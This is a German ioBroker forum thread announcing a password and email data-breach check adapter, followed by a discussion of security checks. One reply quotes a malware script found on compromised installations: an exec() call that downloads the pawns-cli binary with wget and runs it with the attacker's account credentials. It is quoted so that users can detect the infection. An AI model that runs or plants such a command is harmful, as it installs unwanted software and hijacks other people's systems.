Test: ioBroker.pwned-check – Daten auf Datenlecks prüfen
-
ioBroker.pwned-check – Passwörter & E-Mails auf Datenlecks prüfen
Hallo zusammen,
ich möchte euch meinen neuen Adapter ioBroker.pwned-check vorstellen. Er prüft regelmäßig, ob eure Passwörter oder E-Mail-Adressen in bekannten Datenlecks aufgetaucht sind – Passwörter über Have I Been Pwned, E-Mails über XposedOrNot.
Was macht der Adapter?
ioBroker.pwned-check prüft in konfigurierbaren Intervallen:
- Passwörter über die Have I Been Pwned-API – der SHA-1-Hash wird im Browser berechnet, nur die ersten 5 Zeichen werden übertragen (k-Anonymity). Weder das Klartext-Passwort noch der vollständige Hash verlassen euren Server – ioBroker speichert ausschließlich den Hash
- E-Mail-Adressen über die XposedOrNot-API – die Adresse wird direkt abgefragt und mit bekannten Datenleck-Datenbanken abgeglichen
Wird ein Treffer gefunden, wird eine Benachrichtigung ausgelöst. Der Adapter unterstützt das ioBroker Notification-System, sodass sich der Benachrichtigungskanal (z. B. Telegram) bequem über den Notification Manager konfigurieren lässt.
Datenpunkte
Für jedes Passwort und jede E-Mail werden Datenpunkte angelegt:
isPwned– wurde ein Leak gefunden?leakCount– Anzahl der bekannten VorkommenlastCheck– Zeitpunkt der letzten Prüfunginfo.anyPwned– globaler Status, ob irgendetwas kompromittiert ist
Konfiguration
- Adapter installieren und Instanz öffnen
- Passwörter und/oder E-Mail-Adressen eintragen
- Prüfintervall festlegen (Standard: 24 Stunden)
GitHub
- Quellcode & Issues: https://github.com/ipod86/ioBroker.pwned-check
- npm: https://www.npmjs.com/package/iobroker.pwned-check
Feedback, Bugreports und Feature-Wünsche sind herzlich willkommen!
-
ioBroker.pwned-check – Passwörter & E-Mails auf Datenlecks prüfen
Hallo zusammen,
ich möchte euch meinen neuen Adapter ioBroker.pwned-check vorstellen. Er prüft regelmäßig, ob eure Passwörter oder E-Mail-Adressen in bekannten Datenlecks aufgetaucht sind – Passwörter über Have I Been Pwned, E-Mails über XposedOrNot.
Was macht der Adapter?
ioBroker.pwned-check prüft in konfigurierbaren Intervallen:
- Passwörter über die Have I Been Pwned-API – der SHA-1-Hash wird im Browser berechnet, nur die ersten 5 Zeichen werden übertragen (k-Anonymity). Weder das Klartext-Passwort noch der vollständige Hash verlassen euren Server – ioBroker speichert ausschließlich den Hash
- E-Mail-Adressen über die XposedOrNot-API – die Adresse wird direkt abgefragt und mit bekannten Datenleck-Datenbanken abgeglichen
Wird ein Treffer gefunden, wird eine Benachrichtigung ausgelöst. Der Adapter unterstützt das ioBroker Notification-System, sodass sich der Benachrichtigungskanal (z. B. Telegram) bequem über den Notification Manager konfigurieren lässt.
Datenpunkte
Für jedes Passwort und jede E-Mail werden Datenpunkte angelegt:
isPwned– wurde ein Leak gefunden?leakCount– Anzahl der bekannten VorkommenlastCheck– Zeitpunkt der letzten Prüfunginfo.anyPwned– globaler Status, ob irgendetwas kompromittiert ist
Konfiguration
- Adapter installieren und Instanz öffnen
- Passwörter und/oder E-Mail-Adressen eintragen
- Prüfintervall festlegen (Standard: 24 Stunden)
GitHub
- Quellcode & Issues: https://github.com/ipod86/ioBroker.pwned-check
- npm: https://www.npmjs.com/package/iobroker.pwned-check
Feedback, Bugreports und Feature-Wünsche sind herzlich willkommen!
@David-G.
Du könntest auch prüfen ob der Prozess
pawns-cli
auf dem System läuft.
Dann wurde die Kiste nämlich mit Malware infiziert. Auf solchen Systemen läuft dieses unter 'Globale Skripte' abgelegte Ding:exec('cd /tmp/ ; wget https://pawns-app.s3.eu-central-1.amazonxxx.com/cli/latest/linux_x86_64/pawns-cli; chmod -x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=NEW79164@io --accept-tos', function (error, stdout, stderr) { console.log('stdout: ' + stdout); }); -
-
@thomas-braun
Mein System ist sauber und der Adapter installiert die pawns-cli nicht.Läuft alles über API.
@David-G.
Nein, der Adapter könnte aber prüfen, ob das Zeug läuft.
-
Warum genau da drauf prüfen? Gibt ja maleware ohne Ende.
EDIT
Deshalb?
https://forum.iobroker.net/topic/66381/gelöst-seltsames-script-unter-globalIst das noch aktuell?
-
Warum genau da drauf prüfen? Gibt ja maleware ohne Ende.
EDIT
Deshalb?
https://forum.iobroker.net/topic/66381/gelöst-seltsames-script-unter-globalIst das noch aktuell?
@David-G. sagte:
Ist das noch aktuell?
Ja, das ist immer noch aktuell.
-
Warum genau da drauf prüfen? Gibt ja maleware ohne Ende.
EDIT
Deshalb?
https://forum.iobroker.net/topic/66381/gelöst-seltsames-script-unter-globalIst das noch aktuell?
@David-G. sagte:
Deshalb?
Ja!
Das ist kein Einzelfall gewesen! -
@David-G. sagte:
Wer testet es dann freiwillig 🤣?
Unfreiwillig testen es die ganzen Leute, die den Admin ungesichert im Netz stehen haben.
-
@David-G. sagte:
Wer testet es dann freiwillig 🤣?
Unfreiwillig testen es die ganzen Leute, die den Admin ungesichert im Netz stehen haben.
-
H Homoran hat dieses Thema aufgespalten
-
Wird langsam OT!
Du kannst das Thema ja hier heraustrennen :)
Das User Meldungen ignorieren, wird man nicht verhindern können. Wenn sich jemand aber durch ein Adapter Update korrumpierte Pakete unwissentlich einfängt, dann wäre eine Benachrichtigung schon was feines. Die Anzahl der Angriffe auf npm Pakete wird in der Zukunft sicherlich nicht weniger werden ;-)
Die wenigsten Enduser wird man mit den hier im Forum geposteten Skripten erreichen, wenn es mal wieder schadhafte npm Pakete gibt
Im Kleinen hab ich solch einen (zumindest rudimentären) Check in
iob diagdrin. Wobei ich nicht weiß, ob der Check aus externe Module erfasst oder sich auf die 'ab Werk' mitgelieferten beschränkt. -
Im Kleinen hab ich solch einen (zumindest rudimentären) Check in
iob diagdrin. Wobei ich nicht weiß, ob der Check aus externe Module erfasst oder sich auf die 'ab Werk' mitgelieferten beschränkt.@Thomas-Braun Hier geht die Diskussion weiter https://forum.iobroker.net/topic/84252/iobroker.securitycheck-brainstorming
Hey! Du scheinst an dieser Unterhaltung interessiert zu sein, hast aber noch kein Konto.
Hast du es satt, bei jedem Besuch durch die gleichen Beiträge zu scrollen? Wenn du dich für ein Konto anmeldest, kommst du immer genau dorthin zurück, wo du zuvor warst, und kannst dich über neue Antworten benachrichtigen lassen (entweder per E-Mail oder Push-Benachrichtigung). Du kannst auch Lesezeichen speichern und Beiträge positiv bewerten, um anderen Community-Mitgliedern deine Wertschätzung zu zeigen.
Mit deinem Input könnte dieser Beitrag noch besser werden 💗
Registrieren AnmeldenSupport us
623
Online32.8k
Benutzer82.7k
Themen1.3m
Beiträge